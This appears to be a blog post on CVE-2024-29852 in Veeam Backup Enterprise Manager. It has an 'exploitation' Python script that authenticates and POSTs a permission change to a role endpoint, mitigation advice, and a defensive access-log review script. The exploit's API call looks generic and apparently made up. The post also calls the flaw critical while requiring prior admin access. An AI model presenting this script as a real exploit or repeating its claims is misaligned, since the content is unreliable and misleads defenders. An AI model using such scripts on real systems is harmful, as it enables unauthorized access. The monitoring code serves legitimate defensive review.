A recent vulnerability has been discovered in Veeam Backup Enterprise Manager (VBEM), a popular centralized management solution for Veeam backup infrastructures. This vulnerability has been assigned the CVE-ID: CVE-2024-29852. High-privileged users can potentially exploit this vulnerability to gain unauthorized access to backup session logs, which may contain sensitive information. In this post, we will discuss the details of the vulnerability, how to exploit it, and how to mitigate the risk.

Details

Veeam Backup Enterprise Manager provides centralized management for Veeam backup, replication, and recovery tasks for virtual and physical environments. It enables administrators to view, report, and manage numerous Veeam backup servers from a single-pane interface.

The vulnerability discovered in VBEM allows high-privileged users to read backup session logs that they should not have access to. This can be achieved by exploiting a certain flaw in VBEM's implementation of role-based access control (RBAC) policies.

Exploitation

To exploit this vulnerability, an attacker would first need to gain high-privileged access to VBEM. This can be done either by obtaining valid login credentials or by exploiting another security vulnerability that grants administrative access.

Once an attacker has high-privileged access, they can exploit CVE-2024-29852 by modifying the default access control permissions set by VBEM's RBAC policies. The following code snippet demonstrates how an attacker can modify the default permissions and gain unauthorized access to backup session logs:

import requests

# Replace these variables with your VBEM server domain and administrative credentials
vbem_url = "https://DOMAIN:PORT"
username = "USERNAME"
password = "PASSWORD"

# Authenticate and obtain a session token
login_data = {"grant_type": "password", "username": username, "password": password}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(vbem_url + "/api/oauth2/token", data=login_data, headers=headers)
assert response.status_code == 200

session_token = response.json()["access_token"]

# Modify the access control permissions
headers = {"Authorization": "Bearer " + session_token}
data = {"NewPermission": "ReadBackupSessionLogs"}
response = requests.post(vbem_url + "/api/Role/", json=data, headers=headers)
assert response.status_code == 201

print("Access control permissions modified successfully")

After executing this code snippet, an attacker will have unauthorized access to read backup session logs.

- Veeam Security Advisory: https://www.veeam.com/security.html
- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29852

Mitigation

To mitigate the risk associated with this vulnerability, Veeam recommends applying the latest security patches for Veeam Backup Enterprise Manager and applying the principle of least privilege for user accounts accessing the VBEM server. Additionally, it's essential to regularly monitor and review access logs for suspicious activity.
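The monitoring advice above is easier to act on with a concrete check. The following is an added example, not code from Veeam or from this post: it reviews access-log lines for the two events a defender would want surfaced for this CVE, successful changes to the role endpoint and reads of backup session logs by accounts outside an approved list. The log line format is a constructed, simplified one (timestamp, user, method, path, status) and the approved-reader list is an assumption; adapt the regex and the list to the log source and RBAC review your organisation actually has.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample log lines in a hypothetical simplified format:
# "<timestamp> <user> <method> <path> <status>". This is NOT Veeam's real
# audit format; it only illustrates the review logic.
SAMPLE_LOG = """\
2024-05-23T08:01:12Z alice POST /api/oauth2/token 200
2024-05-23T08:01:15Z alice GET /api/backupServers 200
2024-05-23T08:02:40Z bob POST /api/oauth2/token 200
2024-05-23T08:02:58Z bob POST /api/Role/ 201
2024-05-23T08:03:05Z bob GET /api/backupSessions/12/logs 200
2024-05-23T08:03:06Z bob GET /api/backupSessions/13/logs 200
2024-05-23T08:10:00Z svc-monitor GET /api/backupSessions/12/logs 200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<user>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$"
)

# Assumption: the accounts below were confirmed during the least-privilege
# review as the only ones that legitimately read backup session logs.
APPROVED_LOG_READERS = frozenset({"svc-monitor"})

WRITE_METHODS = frozenset({"POST", "PUT", "PATCH", "DELETE"})
SESSION_LOG_RE = re.compile(r"/backupsessions/[^/]+/logs", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    ts: str
    user: str
    reason: str
    path: str


def parse_line(line):
    """Return a dict of fields for a well-formed line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def review_access_log(text, approved_readers=APPROVED_LOG_READERS):
    """Flag successful role changes and session-log reads by non-approved users."""
    findings = []
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue  # unparseable lines are skipped, not treated as findings
        succeeded = rec["status"].startswith("2")
        if not succeeded:
            continue  # only successful requests changed or exposed anything
        path = rec["path"]
        if rec["method"] in WRITE_METHODS and path.lower().startswith("/api/role"):
            findings.append(Finding(rec["ts"], rec["user"],
                                    "role/permission modified", path))
        elif (rec["method"] == "GET" and SESSION_LOG_RE.search(path)
              and rec["user"] not in approved_readers):
            findings.append(Finding(rec["ts"], rec["user"],
                                    "session log read by non-approved account", path))
    return findings


def summarize(findings):
    """Count findings per (user, reason) so a reviewer sees who did what, how often."""
    return Counter((f.user, f.reason) for f in findings)


if __name__ == "__main__":
    results = review_access_log(SAMPLE_LOG)
    for f in results:
        print(f"{f.ts} {f.user}: {f.reason} ({f.path})")
    for (user, reason), n in summarize(results).items():
        print(f"{user}: {reason} x{n}")
```

Run it against the embedded sample and it reports bob's role modification followed by two session-log reads, while the approved monitoring account produces nothing. Failed requests are deliberately ignored so the output stays focused on actions that actually took effect; if you also want to see attempts, drop the status filter and add the status code to the finding.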

In conclusion, CVE-2024-29852 is a critical vulnerability in Veeam Backup Enterprise Manager that allows high-privileged users to gain unauthorized access to backup session logs. To protect against this vulnerability, organizations should follow Veeam's recommendations for applying security patches, reviewing user access permissions, and monitoring activity logs.

Timeline

Published on: 05/22/2024 23:15:09 UTC
Last modified on: 07/03/2024 01:52:49 UTC